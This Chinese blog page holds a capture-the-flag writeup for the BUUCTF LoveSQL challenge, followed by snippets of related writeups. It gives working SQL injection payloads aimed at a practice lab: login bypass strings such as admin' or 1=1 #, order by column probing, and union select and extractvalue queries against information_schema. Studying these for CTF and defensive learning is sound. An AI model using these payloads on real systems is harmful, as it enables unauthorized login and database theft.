【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup

最新推荐文章于 2026-05-11 15:37:38 发布
原创 最新推荐文章于 2026-05-11 15:37:38 发布 · 5.1k 阅读 · 66
标签
#mysql #数据库 #安全 #CTF #sql
本文详细讲解了SQL注入的攻击流程,从发现注入点到利用万能密码登录,再到爆破数据库结构,最终获取flag。涵盖了SQL注入的基础知识、常用技巧及实战案例。

【BUUCTF】[极客大挑战 2019]LoveSQL

一.SQL注入考点

在这里插入图片描述
基础知识点

union 联合查询
information表
group_concat()

注入流程

1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
5.爆数据库
6.爆数据库的表
7.爆出表的列
8.爆出flag

二. 解题过程

0.存在SQL注入

加单引号报错

/check.php?username=1'&password=2
/check.php?username=1&password=2'
/check.php?username=1'&password=2'

在这里插入图片描述

1.万能密码 admin’ or 1=1

或者
1’ or 1=1 #

账号
admin' or 1=1 #
密码
1

在这里插入图片描述

admin
47cb230740bc6725fd194aec8e479fc4

Tips:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23

2.爆字段

check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1

在这里插入图片描述

check.php?username=admin ' order by 4 %23&password=1

改为4,报错,有3个字段


                

                
                
        

    





  


        

            

                      
                        
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



              

                

              

            
              



	

		

			

				
					
LoveSQL

				
			

			

				

					lunan的博客
				

				

					05-15
					
					1515
					
				

			

		

		

			
				
LoveSQL(SQL注入详解)
1、根据题目,显然想到的是sql注入漏洞,直接尝试万能密码


2、此时url构造,查看字段数
/check.php?username=admin' order by 3%23&password=1     # 存在
/check.php?username=admin' order by 4%23&password=1     # 报错

因此,得到总共有三个字段数
注意:url中不能用#,应该用url编码%23
3、用union来查询测试注入点,查看回显点

			
		

	



              


  
              

                


	

		

			

				
					
别再只记payload了!用PHPStudy本地复现‘LoveSQL’注入环境,搞懂每一步原理

				
			

			

				

					weixin_27875131的博客
				

				

					05-10
					
					355
					
				

			

		

		

			
				
本文详细介绍了如何使用PHPStudy在本地复现'LoveSQL'SQL注入环境,从环境搭建到漏洞利用,再到防御方案设计。通过实战演示SQL注入原理,包括万能密码、union select等技术,帮助读者深入理解SQL注入漏洞的形成与防御方法。

			
		

	





	

		

			

				
					
BUUCTF Web [极客挑战 2019]LoveSQL_buuctf lovesql

				
			

			

				

					2401_89791028的博客
				

				

					01-24
					
					902
					
				

			

		

		

			
				
进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码。

			
		

	



		

			
		



	

		

			

				
					
buuctf-[极客挑战 2019]LoveSQL1(小宇特详解)

				
			

			

				

					小宇的web博客
				

				

					01-15
					
					2149
					
				

			

		

		

			
				
buuctf-[极客挑战 2019]LoveSQL1(小宇特详解)
1.这里有账号和密码,这里先尝试一下万能密码(在账号那里注入)
1' or 1=1#

密码随便


这里继续进行注入,判断有几列
1' order by 3;#


这里试一试4
1' order by 4;#



这里通过union联合查询
1' union select 1,2,3;#


这里的2,3都是注入点
这里开始按部就班的注入吧
1' union select 1,2,database();#


1' union se

			
		

	





	

		

			

				
					
buuctf-[极客挑战 2019]LoveSQL

				
			

			

				

					m0_62008601的博客
				

				

					04-04
					
					2962
					
				

			

		

		

			
				
一道基础的sql注入

			
		

	





	

		

			

				
					
[极客挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)

					
热门推荐

				
			

			

				

					qq_45521281的博客
				

				

					04-15
					
					2万+
					
				

			

		

		

			
				
进去之后:
发现登录框,可能是万能密码登录,我们试一下:
在登录框中输入:
用户名:1' or 1=1#
密码:123(随便输)


点击登录

跳转到了check.php页面。并得到了用户名和密码:
尝试密码md5解密失败,还是回到注入的思路上,查询字段数:
在url中输入:
/check.php?username=admin' order by 3%23&password=1    ...

			
		

	





	

		

			

				
					
极客挑战2019LoveSQL解题

				
			

			

				

					Bird&Bird
				

				

					10-25
					
					2999
					
				

			

		

		

			
				
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL

打开被测试站点,是这个样子的,是上一题EasySQL的延续。



2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下:



直接给出了密码。

使用正确的用户名和密码登录一下,结果还是



那使用MD5库碰撞一下,结果也没碰撞出来。

3、继续寻常注入吧。

爆破有多少列(字段数)


username=admin&password=6ec1cab79005129..

			
		

	





	

		

			

				
					
BUUCTF】[极客挑战 2019]LoveSQL1writeup

				
			

			

				

					GZWZ_的博客
				

				

					05-04
					
					1285
					
				

			

		

		

			
				
easysql

			
		

	





	

		

			

				
					
BUUCTF Web】WriteUp详细

				
			

			

				

					qq_62604985的博客
				

				

					07-10
					
					3682
					
				

			

		

		

			
				
buutctf web题目题解, 升三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新

			
		

	





	

		

			

				
					
buuctf-web-[极客挑战 2019]LoveSQL-wp

				
			

			

				

					居上
				

				

					06-27
					
					259
					
				

			

		

		

			
				
[极客挑战 2019]LoveSQL
知识点

常规union select注入

过程
主页:

抓包分析下

手动测试下注入点

order by查下字段

admin' order by 3#



union select寻找显示位

-admin' union select 1,2,3%23



查表

-admin' union select 1,(select group_concat(table_name) from information_schema.tables where tab

			
		

	





	

		

			

				
					
BUUCTF-WriteUp

				
			

			

				

					鱼的博客
				

				

					01-19
					
					1183
					
				

			

		

		

			
				
title: BUUCTF WriteUp
date: 2021-01-16 17:44:59
tags: CTF WriteUP
WEB
[HCTF 2018]WarmUp
启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。

访问source.php,直接给了源码,进行代码审计。
分两块,第一块是emmm::checkFile,里面做了一些判断。
第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。

hint.php

include触发的三个判断.

			
		

	





	

		

			

				
					
BuuCTF 极客挑战SQL注入 WriteUP

				
			

			

				

					她叫常玉莹
				

				

					07-10
					
					666
					
				

			

		

		

			
				
极客挑战EasySQL极客挑战 lovesql极客挑战 babysql极客挑战HardSQL极客挑战FinalSQL
极客挑战EasySQL
直接万能密码 1‘ or 1=1 #得到flag

极客挑战 lovesql
报错注入获取数据库名 geek
' or extractvalue(1,concat('~',database())) #


获取表名 geekuser l0ve1ysql1
' and extractvalue(1,concat(0x7e, (select group_c.

			
		

	





	

		

			

				
					
极客挑战2020_CTF-Web-[极客挑战 2019]BabySQL

				
			

			

				

					weixin_39806288的博客
				

				

					12-06
					
					115
					
				

			

		

		

			
				
CTF-Web-[极客挑战 2019]BabySQL
博客说明
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台
网址
https://buuoj.cn/challenges
题目
Web类,[极客挑战 2019]BabySQL

打开题目的实例

思路
当然第一步还是尝试万能密码...

			
		

	





	

		

			

				
					
BUUCTF [极客挑战 2019]LoveSQL

				
			

			

				

					m0_52824752的博客
				

				

					06-20
					
					192
					
				

			

		

		

			
				
获取靶机

首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错

然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek

但在此之前,先得到列数为3,不是3则提示报错

得到表信息,有两个表geekuser和l0ve1ysq1

先读取表 geekuser 中的字段, 得到字段名 id、username 和 password,很正常的字段名。

再来读内容username 和 password 的内容,得到admin的登录

			
		

	





	

		

			

				
					
buuctf [极客挑战 2019]LoveSQL

				
			

			

				

					qq_1873822的博客
				

				

					03-04
					
					215
					
				

			

		

		

			
				
又一次来到性感又有趣的题目

发现登录框,我们再试试万能密码登录,
在登录框中输入:
用户名:1' or 1=1#
密码:随便输


发现直接出密码,试试MD5解密,md5解密失败,接着回到注入的地方康康
在url中输入:
/check.php?username=admin' order by 3%23&password=1     存在
/check.php?username=admin' order by 4%23&password=1     报错

注意:sql注入结尾的时候不能用#

			
		

	





	

		

			

				
					
BUUCTF Web】[极客挑战 2019]EasySQL 1 Writeup

					
最新发布

				
			

			

				

					2501_93667562的博客
				

				

					05-11
					
					59
					
				

			

		

		

			
				
本文介绍了如何通过SQL注入破解[极客挑战2019]EasySQL1靶机。首先分析登录界面的SQL查询语句结构,发现存在单引号闭合漏洞。通过输入万能密码"admin' OR 1=1#"和"' OR '1'='1'#",成功绕过验证登录系统,获取到flag。文章详细解释了注入原理,并提醒初学者需要独立完成解题流程获取个人专属flag。

			
		

	





	

		

			

				
					
[极客挑战 2019]LoveSQL

				
			

			

				

					qq_53689523的博客
				

				

					02-19
					
					807
					
				

			

		

		

			
				
更改为limit 1,1(从数据库中下标为1(从0开始标号)开始,取一条数据返回)是没有返回消息,说明就geekuser表中就一条数据。爆出来了密码,以为是flag,但是输入以后不对,但是存在注入点我们是检测出来了,接下来就是获取数据库信息。暴出id,username,password三个字段。暴出id,username,password三个字段。所以,我们采用brup,穷举出表内所有数据。最终,在下标为15的数据处,发现了flag。所以,返回的列为3列,且显示2,3列信息。

			
		

	





	

		

			

				
					
[极客挑战 2019]LoveSQL 1(SQL注入)

				
			

			

				

					小谢的博客
				

				

					06-12
					
					5884
					
				

			

		

		

			
				
[极客挑战 2019]LoveSQL 1(SQL注入)

			
		

	





	

		

			

				
					
极客挑战2019】love sql详解

				
			

			

				

					kindyyy的博客
				

				

					04-16
					
					1847
					
				

			

		

		

			
				
这道题其实是最基本的sql注入类型,所以只要掌握最基础的注入知识很容易就可以得到flag

先打开题目,先用万能密码登陆一下

只是一个乱码啊,没什么用,就直接用sql注入了,先查询列数:


1' order by 3 #



有回显,那再尝试一下4?


' order by 4 #



那就只有3列,查询库名吧,直接上


...

			
		

	





	

		

			

				
					
[极客挑战 2019]LoveSQL1 题目分析与详解

				
			

			

				

					2302_79800344的博客
				

				

					02-27
					
					3517
					
				

			

		

		

			
				
一、题目简介。

			
		

	



              




          





        



    





    



      

      

        
      

      





	

		
评论 1

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值